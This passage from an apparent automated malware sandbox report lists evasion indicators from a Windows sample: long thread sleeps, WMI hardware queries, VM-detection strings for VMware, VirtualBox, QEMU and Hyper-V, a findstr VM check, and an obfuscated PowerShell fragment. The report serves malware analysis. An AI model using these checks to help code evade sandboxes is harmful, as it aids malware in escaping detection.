Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 936Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\cmd.exe TID: 7480Thread sleep time: -41900s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1280Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3780Thread sleep count: 3567 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3780Thread sleep count: 2428 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7144Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5776Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 1424Thread sleep count: 423 > 30
Source: C:\Windows\System32\dllhost.exe TID: 1424Thread sleep time: -42300s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 2616Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 3604Thread sleep count: 645 > 30
Source: C:\Windows\System32\winlogon.exe TID: 3604Thread sleep time: -64500s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 5504Thread sleep count: 582 > 30
Source: C:\Windows\System32\lsass.exe TID: 5504Thread sleep time: -58200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6332Thread sleep count: 554 > 30
Source: C:\Windows\System32\svchost.exe TID: 6332Thread sleep time: -55400s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 7152Thread sleep count: 276 > 30
Source: C:\Windows\System32\svchost.exe TID: 7024Thread sleep count: 192 > 30
Source: C:\Windows\System32\svchost.exe TID: 6260Thread sleep count: 523 > 30
Source: C:\Windows\System32\svchost.exe TID: 6260Thread sleep time: -52300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4328Thread sleep count: 511 > 30
Source: C:\Windows\System32\svchost.exe TID: 4328Thread sleep time: -51100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 368Thread sleep count: 497 > 30
Source: C:\Windows\System32\svchost.exe TID: 368Thread sleep time: -49700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5244Thread sleep count: 439 > 30
Source: C:\Windows\System32\svchost.exe TID: 5244Thread sleep time: -43900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2584Thread sleep count: 492 > 30
Source: C:\Windows\System32\svchost.exe TID: 2584Thread sleep time: -49200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4388Thread sleep count: 461 > 30
Source: C:\Windows\System32\svchost.exe TID: 4388Thread sleep time: -46100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1032Thread sleep count: 459 > 30
Source: C:\Windows\System32\svchost.exe TID: 1032Thread sleep time: -45900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3916Thread sleep count: 472 > 30
Source: C:\Windows\System32\svchost.exe TID: 3916Thread sleep time: -47200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1396Thread sleep count: 461 > 30
Source: C:\Windows\System32\svchost.exe TID: 1396Thread sleep time: -46100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 768Thread sleep count: 454 > 30
Source: C:\Windows\System32\svchost.exe TID: 768Thread sleep time: -45400s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5332Thread sleep count: 457 > 30
Source: C:\Windows\System32\svchost.exe TID: 5332Thread sleep time: -45700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6708Thread sleep count: 447 > 30
Source: C:\Windows\System32\svchost.exe TID: 6708Thread sleep time: -44700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4396Thread sleep count: 449 > 30
Source: C:\Windows\System32\svchost.exe TID: 4396Thread sleep time: -44900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5320Thread sleep count: 444 > 30
Source: C:\Windows\System32\svchost.exe TID: 5320Thread sleep time: -44400s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3492Thread sleep count: 445 > 30
Source: C:\Windows\System32\svchost.exe TID: 3492Thread sleep time: -44500s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC40D894 FindFirstFileExW,17_2_00000253FC40D894
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC40DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,17_2_00000253FC40DA18
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC43D894 FindFirstFileExW,17_2_00000253FC43D894
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC43DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,17_2_00000253FC43DA18
Source: C:\Windows\System32\conhost.exeCode function: 18_2_000002A5AF36D894 FindFirstFileExW,18_2_000002A5AF36D894
Source: C:\Windows\System32\conhost.exeCode function: 18_2_000002A5AF36DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_000002A5AF36DA18
Source: C:\Windows\System32\conhost.exeCode function: 37_2_000001780DD2DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,37_2_000001780DD2DA18
Source: C:\Windows\System32\conhost.exeCode function: 37_2_000001780DD2D894 FindFirstFileExW,37_2_000001780DD2D894
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EBDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,38_2_0000020175EBDA18
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EBD894 FindFirstFileExW,38_2_0000020175EBD894
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,38_2_0000020175EEDA18
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EED894 FindFirstFileExW,38_2_0000020175EED894
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D0165ED894 FindFirstFileExW,39_2_000002D0165ED894
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D0165EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,39_2_000002D0165EDA18
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D01661D894 FindFirstFileExW,39_2_000002D01661D894
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D01661DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,39_2_000002D01661DA18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: svchost.exe, 00000031.00000000.2819574872.0000022E66A2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3415075913.0000022E66A2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FE57000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxsf.sys
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.drBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FAC9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: qemuwmi2
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.49.drBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
Source: System.evtx.49.drBinary or memory string: VMCI: Using capabilities (0x1c).
Source: Amcache.hve.11.drBinary or memory string: vmci.sys
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FC8C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $Hyper-V Volume Shadow Copy Requestor
Source: Amcache.hve.11.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.11.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.49.drBinary or memory string: VMware
Source: Amcache.hve.11.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.11.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FE57000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxguest.sys
Source: Microsoft-Windows-PowerShell%4Operational.evtx.49.drBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
Source: Amcache.hve.11.drBinary or memory string: VMware Virtual USB Mouse
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FAC9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: QEMU HARDDISK
Source: Amcache.hve.11.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VBoxMouse.sys
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.drBinary or memory string: storahciNECVMWarVMware SATA CD00
Source: Amcache.hve.11.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.49.drBinary or memory string: VMware Virtual disk 2.0 6000c29c2bea38880a8a16ee9f37bec9PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.11.drBinary or memory string: \driver\vmci,\driver\pci
Source: cmd.exe, 00000011.00000003.2404007494.00000253FC17D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.2414667829.00000253FC177000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.2414573614.00000253FC177000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.2414801651.00000253FC177000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.2404051341.00000253FC178000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.2414965006.00000253FC177000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Winsta0\Default=::=::\=C:=C:\Users\user\DesktopAbHorsAGfLWFjJNrKHvWocR=e-Expression 'adnRtmnvxKrKceiWEAAFQW=ion '$TIMGz=qVaeeTRxshUrjZxfqxJBFkNYzLaL=lckmblckpblckrAfNoxIvdXhTBbvJNzCkKYxLKaXkycRIThPnjF=kmblck($Vcvep,AGZcOpprjzwDmCNlvINgjjZlHsYSLqNSSCis=lckSblckyblcksAhnCzrQTYKNgoLUmdjzOYMYqKajhkheLybvqwPqKmnHEAeKjNfwbgEgNiWSyiIJQFcHnpDPnTPBLfuQGqZ
Source: Microsoft-Windows-PowerShell%4Operational.evtx.49.drBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VBoxGuest.sys
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: !Hyper-V PowerShell Direct Service
Source: Microsoft-Windows-PowerShell%4Operational.evtx.49.drBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: Amcache.hve.11.drBinary or memory string: VMware
Source: Microsoft-Windows-PowerShell%4Operational.evtx.49.drBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $p43da5e64-eb7b-4fa8-a45c-cf68357b99d6C:\Program Files (x86)\Joebox\unpack\wmievasions.ps1lp.
Source: dwm.exe, 0000002A.00000000.2781110332.000001D156AA0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000gB
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FE57000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxservice
Source: svchost.exe, 00000031.00000000.2819741090.0000022E66A43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmci
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FE57000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmusrvc2
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.drBinary or memory string: VMware SATA CD00
Source: Amcache.hve.11.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: svchost.exe, 0000002F.00000002.3453193611.00000200A2218000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.drBinary or memory string: NECVMWarVMware SATA CD00
Source: svchost.exe, 00000031.00000002.3426686743.0000022E67060000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: D8VMwareVirtual disk6000c29c2bea38880a8a16ee9f37bec9
Source: Amcache.hve.11.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.49.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-PowerShell%4Operational.evtx.49.drBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.49.drBinary or memory string: D8VMwareVirtual disk6000c29c2bea38880a8a16ee9f37bec98
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.drBinary or memory string: LSI_SASVMware Virtual disk 6000c29c2bea38880a8a16ee9f37bec9
Source: svchost.exe, 00000029.00000000.2774511050.0000014E41C13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: Microsoft-Windows-PowerShell%4Operational.evtx.49.drBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FAC9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: qemu-ga
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicshutdown
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.drBinary or memory string: nonicNECVMWarVMware SATA CD00
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.49.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $Hyper-V Time Synchronization Service
Source: Amcache.hve.11.drBinary or memory string: VMware20,1
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicvss
Source: Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.11.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.11.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: svchost.exe, 00000031.00000000.2821524945.0000022E6747B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmciAP<
Source: svchost.exe, 00000031.00000000.2821695169.0000022E6749C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dowvmci
Source: Amcache.hve.11.drBinary or memory string: VMware VMCI Bus Device
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.49.drBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.drBinary or memory string: nonicVMware Virtual disk 6000c29c2bea38880a8a16ee9f37bec9
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmmouse.sys
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: -Hyper-V Remote Desktop Virtualization Service
Source: Amcache.hve.11.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.11.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.11.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.11.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.11.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FE57000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxmouse.sys
Source: Amcache.hve.11.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: C:\Program Files\VMware
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.49.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.49.drBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>art(
Source: Microsoft-Windows-Partition%4Diagnostic.evtx.49.drBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: Amcache.hve.11.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: lsass.exe, 00000028.00000000.2769194456.000002D6F0613000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3404687627.000002D6F0613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.3394717290.0000014E41C13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000029.00000000.2774511050.0000014E41C13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.3407396288.0000023C9FE2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002C.00000000.2798624056.0000023C9FE2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000000.2802138190.000001A1CA034000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002D.00000002.3395077606.000001A1CA02A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.2812656244.00000200A1241000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000002.3408969107.00000200A1241000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3416713166.0000022E66A43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
Source: lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
Source: Amcache.hve.11.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.drBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000036.00000000.2839389298.00000227D882B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
Source: svchost.exe, 00000031.00000002.3464975209.0000022E67EE7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: s\Gvmci
Source: svchost.exe, 0000002D.00000000.2801923475.000001A1CA000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: Amcache.hve.11.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FE57000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: c:\program files\vmware
Source: lsass.exe, 00000028.00000002.3408803122.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VBoxSF.sys
Source: dwm.exe, 0000002A.00000002.3466156468.000001D156B0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
